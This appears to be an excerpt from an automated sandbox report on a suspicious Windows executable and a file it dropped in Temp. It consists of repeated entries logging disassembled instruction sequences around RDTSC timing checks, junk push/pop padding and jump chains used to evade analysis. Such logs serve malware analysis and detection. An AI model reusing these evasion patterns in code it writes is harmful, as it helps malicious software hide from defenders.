Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470335 second address: 547038F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 jg 00007F24D8FC2FCFh 0x00000019 jmp 00007F2468994EA5h 0x0000001e js 00007F2468994EF9h 0x00000024 pushad 0x00000025 mov di, ax 0x00000028 mov dx, si 0x0000002b popad 0x0000002c cmp dword ptr [ebp-14h], edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F2468994E9Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547038F second address: 5470393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470393 second address: 5470399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470399 second address: 5470415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F24D9324B26h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F2468CF6A3Eh 0x00000016 sub ecx, 59192F38h 0x0000001c jmp 00007F2468CF6A3Bh 0x00000021 popfd 0x00000022 movzx ecx, dx 0x00000025 popad 0x00000026 mov ebx, dword ptr [ebp+08h] 0x00000029 jmp 00007F2468CF6A3Bh 0x0000002e lea eax, dword ptr [ebp-2Ch] 0x00000031 jmp 00007F2468CF6A46h 0x00000036 xchg eax, esi 0x00000037 jmp 00007F2468CF6A40h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470415 second address: 547041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547041C second address: 547047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F2468CF6A44h 0x00000010 push esi 0x00000011 mov dx, CA34h 0x00000015 pop edi 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F2468CF6A46h 0x0000001f jmp 00007F2468CF6A45h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 mov dh, ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547047F second address: 54704E4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2468994EA3h 0x00000008 adc eax, 35946FDEh 0x0000000e jmp 00007F2468994EA9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 mov edi, 5F764BF2h 0x0000001e movsx ebx, ax 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F2468994EA2h 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a mov edi, ecx 0x0000002c movzx esi, dx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54704E4 second address: 5470515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F2468CF6A47h 0x0000000a jmp 00007F2468CF6A43h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470515 second address: 547051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547058E second address: 54705B0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2468CF6A49h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54705B0 second address: 5460AB5 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 63h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F24D8FC2F34h 0x0000000d xor eax, eax 0x0000000f jmp 00007F246896E5CAh 0x00000014 pop esi 0x00000015 pop edi 0x00000016 pop ebx 0x00000017 leave 0x00000018 retn 0004h 0x0000001b nop 0x0000001c sub esp, 04h 0x0000001f mov esi, eax 0x00000021 cmp esi, 00000000h 0x00000024 setne al 0x00000027 xor ebx, ebx 0x00000029 test al, 01h 0x0000002b jne 00007F2468994E97h 0x0000002d jmp 00007F2468994FC1h 0x00000032 call 00007F246CE5AB31h 0x00000037 mov edi, edi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F2468994E9Dh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5460AB5 second address: 5460ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5460ABB second address: 5460ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5460BE8 second address: 5460BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5460BEE second address: 5470AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F2468994EA6h 0x00000011 ret 0x00000012 nop 0x00000013 and bl, 00000001h 0x00000016 movzx eax, bl 0x00000019 add esp, 28h 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f pop ebp 0x00000020 ret 0x00000021 add esp, 04h 0x00000024 mov eax, dword ptr [00FABBB8h+ebx*4] 0x0000002b mov ecx, 15B4E13Fh 0x00000030 xor ecx, dword ptr [00FABBC0h] 0x00000036 add eax, ecx 0x00000038 inc eax 0x00000039 jmp eax 0x0000003b push edi 0x0000003c call 00007F24689BE7E4h 0x00000041 push ebp 0x00000042 push ebx 0x00000043 push edi 0x00000044 push esi 0x00000045 sub esp, 0000017Ch 0x0000004b mov dword ptr [esp+00000160h], 00FADD20h 0x00000056 mov dword ptr [esp+0000015Ch], 000000D0h 0x00000061 mov dword ptr [esp], 00000000h 0x00000068 mov eax, dword ptr [00FA9D4Ch] 0x0000006d call eax 0x0000006f mov edi, edi 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470AC4 second address: 5470AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470AD3 second address: 5470B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2468994E9Eh 0x0000000f push eax 0x00000010 jmp 00007F2468994E9Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2468994EA5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470B23 second address: 5470B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 jmp 00007F2468CF6A48h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2468CF6A3Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470B54 second address: 5470B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470B5A second address: 5470B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov cx, bx 0x00000016 call 00007F2468CF6A49h 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470B94 second address: 5470BC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F24D8FB2CEFh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F2468994EA7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470C45 second address: 5470C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f mov esi, 00000000h 0x00000014 jmp 00007F2468CF6A3Ch 0x00000019 mov dword ptr [ebp-1Ch], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F2468CF6A47h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470C81 second address: 5470C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470CB4 second address: 5470CC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470CC4 second address: 5470CDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470CDD second address: 5470CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470CE1 second address: 5470CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470CE7 second address: 5470D3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F24D930A6CCh 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 pushfd 0x00000012 jmp 00007F2468CF6A43h 0x00000017 or al, FFFFFF8Eh 0x0000001a jmp 00007F2468CF6A49h 0x0000001f popfd 0x00000020 popad 0x00000021 cmp dword ptr [ebp+08h], 00002000h 0x00000028 pushad 0x00000029 pushad 0x0000002a mov edx, eax 0x0000002c mov dh, cl 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548094A second address: 5480950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480950 second address: 5480954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480954 second address: 5480970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2468994EA1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480970 second address: 5480976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480976 second address: 548097A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548097A second address: 54809A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov dx, B974h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, esi 0x0000001b jmp 00007F2468CF6A40h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54809A6 second address: 5480A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F2468994EA6h 0x0000000f push eax 0x00000010 jmp 00007F2468994E9Bh 0x00000015 xchg eax, esi 0x00000016 jmp 00007F2468994EA6h 0x0000001b mov esi, dword ptr [ebp+0Ch] 0x0000001e jmp 00007F2468994EA0h 0x00000023 test esi, esi 0x00000025 pushad 0x00000026 mov eax, 492233ADh 0x0000002b movzx esi, bx 0x0000002e popad 0x0000002f je 00007F24D8FA283Fh 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F2468994E9Bh 0x0000003c jmp 00007F2468994EA3h 0x00000041 popfd 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480A38 second address: 5480A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 cmp dword ptr [75AF459Ch], 05h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov al, bl 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480A4E second address: 5480A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480ADF second address: 5480AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480AF7 second address: 5480AFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480AFB second address: 5480B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dx, cx 0x0000000d movzx esi, bx 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F2468CF6A43h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B26 second address: 5480B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B2A second address: 5480B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B30 second address: 5480B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B56 second address: 5480B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B5A second address: 5480B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B60 second address: 5480B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B6F second address: 5480B73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B73 second address: 5480B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480B81 second address: 5480B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: F6FFDE second address: F6F7E1 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2468CF6A4Bh 0x00000008 jmp 00007F2468CF6A45h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F2468CF6A3Bh 0x00000015 nop 0x00000016 js 00007F2468CF6A37h 0x0000001c stc 0x0000001d push dword ptr [ebp+122D1229h] 0x00000023 xor dword ptr [ebp+122D1B72h], eax 0x00000029 call dword ptr [ebp+122D195Dh] 0x0000002f pushad 0x00000030 cld 0x00000031 xor eax, eax 0x00000033 jmp 00007F2468CF6A41h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c cld 0x0000003d jg 00007F2468CF6A4Ch 0x00000043 jmp 00007F2468CF6A46h 0x00000048 mov dword ptr [ebp+122D36A1h], eax 0x0000004e clc 0x0000004f jmp 00007F2468CF6A3Ah 0x00000054 mov esi, 0000003Ch 0x00000059 add dword ptr [ebp+122D2703h], esi 0x0000005f pushad 0x00000060 mov bx, B6F0h 0x00000064 adc ah, 00000039h 0x00000067 popad 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2703h], esi 0x00000072 lodsw 0x00000074 jmp 00007F2468CF6A45h 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d cld 0x0000007e mov ebx, dword ptr [esp+24h] 0x00000082 stc 0x00000083 nop 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: F6F7E1 second address: F6F7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: F6F7E5 second address: F6F7FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F178F second address: 10F1799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10D9E55 second address: 10D9E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10D9E5A second address: 10D9E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994E9Eh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10D9E6E second address: 10D9E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10D9E72 second address: 10D9E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0C09 second address: 10F0C11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0EC3 second address: 10F0ED3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0ED3 second address: 10F0F03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2468CF6A42h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2468CF6A48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0F03 second address: 10F0F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0F07 second address: 10F0F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A40h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F2468CF6A36h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0F2A second address: 10F0F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F2468994E96h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F0F3A second address: 10F0F44 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2468CF6A36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F453A second address: 10F45DF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c clc 0x0000000d push 00000003h 0x0000000f mov edx, dword ptr [ebp+122D1B78h] 0x00000015 push 00000000h 0x00000017 jmp 00007F2468994EA8h 0x0000001c jmp 00007F2468994E9Eh 0x00000021 push 00000003h 0x00000023 mov edi, ecx 0x00000025 call 00007F2468994EA4h 0x0000002a stc 0x0000002b pop ecx 0x0000002c call 00007F2468994E99h 0x00000031 jmp 00007F2468994E9Dh 0x00000036 push eax 0x00000037 pushad 0x00000038 jmp 00007F2468994EA2h 0x0000003d pushad 0x0000003e push eax 0x0000003f pop eax 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 popad 0x00000044 mov eax, dword ptr [esp+04h] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F2468994EA5h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F45DF second address: 10F45F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	RDTSC instruction interceptor: First address: 10F45F6 second address: 10F4635 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2468994EA3h 0x00000008 jmp 00007F2468994E9Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jnp 00007F2468994E9Eh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2468994EA2h 0x00000022 rdtsc
